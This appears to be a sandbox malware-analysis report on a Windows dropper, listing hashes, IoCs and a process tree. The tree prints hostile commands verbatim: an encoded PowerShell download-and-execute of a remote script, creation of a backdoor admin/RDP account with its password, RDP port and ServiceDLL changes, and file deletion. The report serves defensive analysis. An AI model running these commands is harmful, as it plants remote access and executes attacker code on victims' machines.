Analysis
- max time kernel: 150s
- max time network: 152s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 01-10-2021 15:56

Static task: static1
Behavioral task: behavioral1
- Sample: 65a112982cc0d4e56c078c5333ed3553905bf4f3a639f2ff6e056ab518b6290e.exe
- Resource: win10v20210408
- Platform: windows10_x64
- 0 signatures
- 0 seconds
General
- Target: 65a112982cc0d4e56c078c5333ed3553905bf4f3a639f2ff6e056ab518b6290e.exe
- Size: 5.7MB
- MD5: c1e0df4f2321e9375baee3a0a26fba64
- SHA1: dcf4d90d2f3fd11f14b5413be5b7dde70ff33f7c
- SHA256: 65a112982cc0d4e56c078c5333ed3553905bf4f3a639f2ff6e056ab518b6290e
- SHA512: 4bc74603d8a7a28a0c965cb78d7762c01312cdb6ee7d8be8f822ebb6bf3dbd273ac76c3ad5d0c70f9fa9439981c19a9bed4525f445d7faddb93e9db5a66a0ad7
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Deobfuscated
- URLs:
  - ps1.dropper: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
  flow | pid  | Process
  13   | 1596 | powershell.exe
  15   | 1596 | powershell.exe
  16   | 1596 | powershell.exe
  17   | 1596 | powershell.exe
  19   | 1596 | powershell.exe
  21   | 1596 | powershell.exe
  23   | 1596 | powershell.exe
  25   | 1596 | powershell.exe
  27   | 1596 | powershell.exe
- Modifies RDP port number used by Windows (1 TTP)
- Sets DLL path for service in the registry (2 TTPs)
-
  resource                                     | yara_rule
  behavioral1/files/0x000700000001ab42-358.dat | upx
  behavioral1/files/0x000200000001a4f4-359.dat | upx
- Loads dropped DLL (2 IoCs)
  pid  | Process
  1468 | Process not Found
  1468 | Process not Found
- Drops file in Program Files directory (4 IoCs)
  description                  | ioc                                                                          | Process
  File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT     | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI     | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT   | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI   | powershell.exe
- Drops file in Windows directory (19 IoCs)
  description                  | ioc                                                                                                                | Process
  File opened for modification | C:\Windows\branding\Basebrd                                                                                        | powershell.exe
  File opened for modification | C:\Windows\branding\mediasrv.png                                                                                   | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI44D3.tmp                                                        | powershell.exe
  File created                 | C:\Windows\branding\mediasrv.png                                                                                   | powershell.exe
  File created                 | C:\Windows\branding\mediasvc.png                                                                                   | powershell.exe
  File opened for modification | C:\Windows\branding\mediasvc.png                                                                                   | powershell.exe
  File created                 | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP                                                       | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI44C2.tmp                                                        | powershell.exe
  File created                 | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File created                 | C:\Windows\branding\wupsvc.jpg                                                                                     | powershell.exe
  File opened for modification | C:\Windows\branding\ShellBrd                                                                                       | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI44A1.tmp                                                        | powershell.exe
  File created                 | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log            | powershell.exe
  File opened for modification | C:\Windows\branding\wupsvc.jpg                                                                                     | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4414.tmp                                                        | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI44B2.tmp                                                        | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat                  | powershell.exe
  File created                 | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_cjtogn5e.axc.ps1                 | powershell.exe
  File created                 | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_y0uunai4.w4x.psm1                | powershell.exe
- Modifies data under HKEY_USERS (64 IoCs)
- Modifies registry key (1 TTP, 1 IoC)
  pid | Process
  344 | reg.exe
- Runs net.exe
- Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  description            | flow | ioc
  HTTP User-Agent header | 15   | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 16   | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 17   | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 19   | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  pid  | Process
  1364 | powershell.exe
  1364 | powershell.exe
  1364 | powershell.exe
  496  | powershell.exe
  496  | powershell.exe
  496  | powershell.exe
  2468 | powershell.exe
  2468 | powershell.exe
  2468 | powershell.exe
  2608 | powershell.exe
  2608 | powershell.exe
  2608 | powershell.exe
  1364 | powershell.exe
  1364 | powershell.exe
  1364 | powershell.exe
  1596 | powershell.exe
  1596 | powershell.exe
  1596 | powershell.exe
- Suspicious behavior: LoadsDriver (2 IoCs)
  pid | Process
  624 | Process not Found
  624 | Process not Found
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
- Suspicious use of WriteProcessMemory (64 IoCs)
Processes
- [1] C:\Users\Admin\AppData\Local\Temp\65a112982cc0d4e56c078c5333ed3553905bf4f3a639f2ff6e056ab518b6290e.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\65a112982cc0d4e56c078c5333ed3553905bf4f3a639f2ff6e056ab518b6290e.exe"
  PID: 640
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    PID: 1364
    Signatures: Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oecrgbpt\oecrgbpt.cmdline"
      PID: 2460
      Signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAF36.tmp" "c:\Users\Admin\AppData\Local\Temp\oecrgbpt\CSC65B6EBA2EC994772843A947D0956998.TMP"
        PID: 2496
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      PID: 496
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      PID: 2468
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      PID: 2608
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
      PID: 3920
    - [3] C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      PID: 344
      Signatures: Modifies registry key
    - [3] C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
      PID: 2996
    - [3] C:\Windows\system32\net.exe
      Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      PID: 2012
      Signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        PID: 3712
    - [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      PID: 1000
      Signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\cmd.exe
        Command line: cmd /c net start rdpdr
        PID: 3980
        Signatures: Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\net.exe
          Command line: net start rdpdr
          PID: 1992
          Signatures: Suspicious use of WriteProcessMemory
          - [6] C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 start rdpdr
            PID: 1128
    - [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      PID: 1576
      Signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\cmd.exe
        Command line: cmd /c net start TermService
        PID: 3596
        Signatures: Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\net.exe
          Command line: net start TermService
          PID: 2140
          Signatures: Suspicious use of WriteProcessMemory
          - [6] C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 start TermService
            PID: 2456
    - [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
      PID: 2336
    - [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
      PID: 1264
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user WgaUtilAcc 000000 /del
  PID: 3956
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe user WgaUtilAcc 000000 /del
    PID: 3084
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
      PID: 576
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user WgaUtilAcc icvblpAe /add
  PID: 2252
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe user WgaUtilAcc icvblpAe /add
    PID: 4068
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user WgaUtilAcc icvblpAe /add
      PID: 496
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  PID: 4000
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    PID: 3080
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
      PID: 1000
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  PID: 3712
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
    PID: 1276
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
      PID: 2084
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  PID: 2292
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    PID: 2468
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
      PID: 2496
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user WgaUtilAcc icvblpAe
  PID: 1596
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe user WgaUtilAcc icvblpAe
    PID: 396
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user WgaUtilAcc icvblpAe
      PID: 1284
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic path win32_VideoController get name
  PID: 3852
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic path win32_VideoController get name
    PID: 3324
    Signatures: Modifies data under HKEY_USERS
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic CPU get NAME
  PID: 496
  - [2] C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic CPU get NAME
    PID: 2336
    Signatures: Modifies data under HKEY_USERS
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  PID: 2664
  - [2] C:\Windows\system32\cmd.exe
    Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    PID: 3260
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      PID: 1596
      Signatures: Blocklisted process makes network request; Drops file in Program Files directory; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses